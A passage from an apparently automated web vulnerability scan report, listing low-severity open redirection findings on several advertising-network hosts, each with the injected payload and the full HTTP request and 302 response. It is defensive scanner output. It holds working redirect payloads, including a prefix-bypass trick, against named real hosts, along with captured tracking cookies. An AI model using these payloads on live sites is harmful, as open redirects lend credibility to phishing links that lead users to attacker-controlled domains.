Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; matchadmeld=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 02:41:54 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F9fe32a2a616072d9e602100c;Path=/;Domain=.w55c.net;Expires=Tue, 03-Sep-13 02:41:54 GMT
X-Version: DataXu Pixel Tracker v3
Cache-Control: private
Content-Length: 0
Location: http://ad6a2780f57aabe38/a?http://pixel.rubiconproject.com/tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F9fe32a2a616072d9e602100c&expires=10
Via: 1.1 dfw175164010000 (MII-APC/2.1)
Content-Type: text/plain


14.7. http://ib.adnxs.com/getuid [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload http%3a//a40de65f7f39bb3ae/a%3f1 was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

Request

GET /getuid?http%3a//a40de65f7f39bb3ae/a%3f1=1 HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 04:15:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2230616255569715877; path=/; expires=Sat, 03-Dec-2011 04:15:13 GMT; domain=.adnxs.com; HttpOnly
Location: http://a40de65f7f39bb3ae/a?1=1
Date: Sun, 04 Sep 2011 04:15:13 GMT
Content-Length: 0
Connection: close


14.8. http://ib.adnxs.com/getuidnb [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuidnb

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload http%3a//ac368a1e0bfebaaff/a%3f1 was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

Request

GET /getuidnb?http%3a//ac368a1e0bfebaaff/a%3f1=1 HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 04:15:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2230616255569715877; path=/; expires=Sat, 03-Dec-2011 04:15:11 GMT; domain=.adnxs.com; HttpOnly
Location: http://ac368a1e0bfebaaff/a?1=1
Date: Sun, 04 Sep 2011 04:15:11 GMT
Content-Length: 0
Connection: close


14.9. http://ib.adnxs.com/mapuid [redir parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /mapuid

Issue detail

The value of the redir request parameter is used to perform an HTTP redirect. The payload http%3a//af27456aead3f8856/a%3fhttp%3a//ad.yieldmanager.com/pixel%3ft%3d2%26id%3d1413320 was submitted in the redir parameter. This caused a redirection to the following URL:

Request

GET /mapuid?t=2&member=1001&user=9035684957&seg=166323&seg_code=33x&redir=http%3a//af27456aead3f8856/a%3fhttp%3a//ad.yieldmanager.com/pixel%3ft%3d2%26id%3d1413320&random=421629 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3I*!2a3C06.$K; sess=1; uuid2=6422714091563403120

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 02:41:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=9223372036854775807; path=/; expires=Sat, 03-Dec-2011 02:41:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=9223372036854775807; path=/; expires=Sat, 03-Dec-2011 02:41:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip_TyZV-'>EkOWfV9E:DRWe!9=@-y4lG; path=/; expires=Sat, 03-Dec-2011 02:41:17 GMT; domain=.adnxs.com; HttpOnly
Location: http://af27456aead3f8856/a?http://ad.yieldmanager.com/pixel?t=2&id=1413320
Date: Sun, 04 Sep 2011 02:41:17 GMT
Content-Length: 0


14.10. http://login.dotomi.com/ucm/UCMController [redir_url parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The value of the redir_url request parameter is used to perform an HTTP redirect. The payload http%3a//a6d06e1775a213a49/a%3fhttp%3a//usucmweb.dotomi.com/nai/nai_optout_redir.php was submitted in the redir_url parameter. This caused a redirection to the following URL:

Request

GET /ucm/UCMController?dtm_com=31&dtm_cid=2000&dtm_cmagic=7d619c&dtm_format=7&redir_url=http%3a//a6d06e1775a213a49/a%3fhttp%3a//usucmweb.dotomi.com/nai/nai_optout_redir.php HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rt_1982=2; DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaV0%3D; DotomiRR2304=-1$4$1$-1$1$1$; rt_12783=2

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:25:26 GMT
X-Name: dmc-s01
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Fri, 02-Sep-2016 11:25:26 GMT; Path=/
Location: http://a6d06e1775a213a49/a?http://usucmweb.dotomi.com/nai/nai_optout_redir.php

Content-Type: text/html
Content-Length: 0


14.11. http://nai.ad.us-ec.adtechus.com/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//a311f99c2913cd7d7/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=4&rd=http%3a//a311f99c2913cd7d7/a%3fhttp%3a//advertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:07:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1638880730
Location: http://a311f99c2913cd7d7/a?http://advertising.aol.com/token/4/3/1638880730/
Expires: Sun, 04 Sep 2011 11:07:45 GMT
Content-Length: 0
Content-Type: text/html


14.12. http://nai.adserver.adtechus.com/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//a81cb79250c97900c/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=5&rd=http%3a//a81cb79250c97900c/a%3fhttp%3a//advertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:07:29 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=191147844
Location: http://a81cb79250c97900c/a?http://advertising.aol.com/token/5/3/191147844/
Expires: Sun, 04 Sep 2011 11:07:30 GMT
Content-Length: 0
Content-Type: text/html


14.13. http://nai.adserverec.adtechus.com/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//a2abb41860bbc3ed5/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=6&rd=http%3a//a2abb41860bbc3ed5/a%3fhttp%3a//advertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:06:50 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1397388556
Location: http://a2abb41860bbc3ed5/a?http://advertising.aol.com/token/6/3/1397388556/
Expires: Sun, 04 Sep 2011 11:06:51 GMT
Content-Length: 0
Content-Type: text/html


14.14. http://nai.adserverwc.adtechus.com/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//a3a96b51ba5414b1a/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=7&rd=http%3a//a3a96b51ba5414b1a/a%3fhttp%3a//advertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:07:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=2102766014
Location: http://a3a96b51ba5414b1a/a?http://advertising.aol.com/token/7/3/2102766014/
Expires: Sun, 04 Sep 2011 11:07:43 GMT
Content-Length: 0
Content-Type: text/html


14.15. http://nai.adsonar.com/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//ade8e5ac19cc04089/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=1&rd=http%3a//ade8e5ac19cc04089/a%3fhttp%3a//advertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:07:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=904952562
Location: http://ade8e5ac19cc04089/a?http://advertising.aol.com/token/1/3/904952562/
Expires: Sun, 04 Sep 2011 11:07:45 GMT
Content-Length: 0
Content-Type: text/html


14.16. http://nai.adtech.de/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//a4471e352a8025e10/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=3&rd=http%3a//a4471e352a8025e10/a%3fhttp%3a//advertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC156E651A4418BD90FFF0106094

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:07:23 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1295036262
Location: http://a4471e352a8025e10/a?http://advertising.aol.com/token/3/3/1295036262/
Expires: Sun, 04 Sep 2011 11:07:24 GMT
Content-Length: 0
Content-Type: text/html


14.17. http://nai.advertising.com/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.advertising.com
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//a2c55c4e592b085f6/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=0&rd=http%3a//a2c55c4e592b085f6/a%3fhttp%3a//advertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.advertising.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=MTMxNTA5NzMwOTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; ACID=Rq690013151032380008; C2=HIuYO9aFHYIiGD8sQdwSkaMwSKMCdbdRrxK4IEscGAHtnggnraAc; F1=Bgg4i5EBAAAABAAAAIAAgEA; BASE=oTwUjn8fYrESn1x8Qj3fRMC!; ROLL=XpwfbsHr/Y/PQCLUeRRTttG!; aceRTB=rm%3DTue%2C%2004%20Oct%202011%2002%3A28%3A00%20GMT%7Cam%3DTue%2C%2004%20Oct%202011%2002%3A28%3A00%20GMT%7Cdc%3DTue%2C%2004%20Oct%202011%2002%3A28%3A00%20GMT%7Can%3DTue%2C%2004%20Oct%202011%2002%3A28%3A00%20GMT%7Crub%3DTue%2C%2004%20Oct%202011%2002%3A28%3A00%20GMT%7C

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:07:00 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1852793721
Location: http://a2c55c4e592b085f6/a?http://advertising.aol.com/token/0/3/1852793721/
Expires: Sun, 04 Sep 2011 11:07:01 GMT
Content-Length: 0
Content-Type: text/html


14.18. http://nai.glb.adtechus.com/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//ab7b48721080a997/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=8&rd=http%3a//ab7b48721080a997/a%3fhttp%3a//advertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:07:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=121529639
Location: http://ab7b48721080a997/a?http://advertising.aol.com/token/8/3/121529639/
Expires: Sun, 04 Sep 2011 11:07:34 GMT
Content-Length: 0
Content-Type: text/html


14.19. http://nai.tacoda.at.atwola.com/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//aa7016814efa99fe6/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=2&rd=http%3a//aa7016814efa99fe6/a%3fhttp%3a//advertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eadx=x; ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:08:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1155214146
Location: http://aa7016814efa99fe6/a?http://advertising.aol.com/token/2/3/1155214146/
Expires: Sun, 04 Sep 2011 11:08:17 GMT
Content-Length: 0
Content-Type: text/html


14.20. http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/1737249030/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b356934616b41434d6658 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/1737249030/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b356934616b41434d6658

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a7f0116cec1d303cb/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/1737249030/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b356934616b41434d6658?.a7f0116cec1d303cb/=1 HTTP/1.1
Host: oasc12.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:17:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://.a7f0116cec1d303cb/=1
Content-Length: 301
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://.a7f0116cec1d303cb/=1">here</a>.</p>
<hr
...[SNIP]...

14.21. http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/99863551/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b354a4f636f41446f5675 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/99863551/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b354a4f636f41446f5675

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a482d39c455a0bdc7/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/99863551/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b354a4f636f41446f5675?.a482d39c455a0bdc7/=1 HTTP/1.1
Host: oasc12.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:18:05 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://.a482d39c455a0bdc7/=1
Content-Length: 301
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://.a482d39c455a0bdc7/=1">here</a>.</p>
<hr
...[SNIP]...

14.22. http://optout.crwdcntrl.net/optout [d parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The value of the d request parameter is used to perform an HTTP redirect. The payload http%3a//aaeebcc5cb07bba75/a%3fhttp%3a//optout.crwdcntrl.net/optout/check.php%3fsrc%3dnaioo was submitted in the d parameter. This caused a redirection to the following URL:

Request

GET /optout?d=http%3a//aaeebcc5cb07bba75/a%3fhttp%3a//optout.crwdcntrl.net/optout/check.php%3fsrc%3dnaioo&ct=Y HTTP/1.1
Host: optout.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
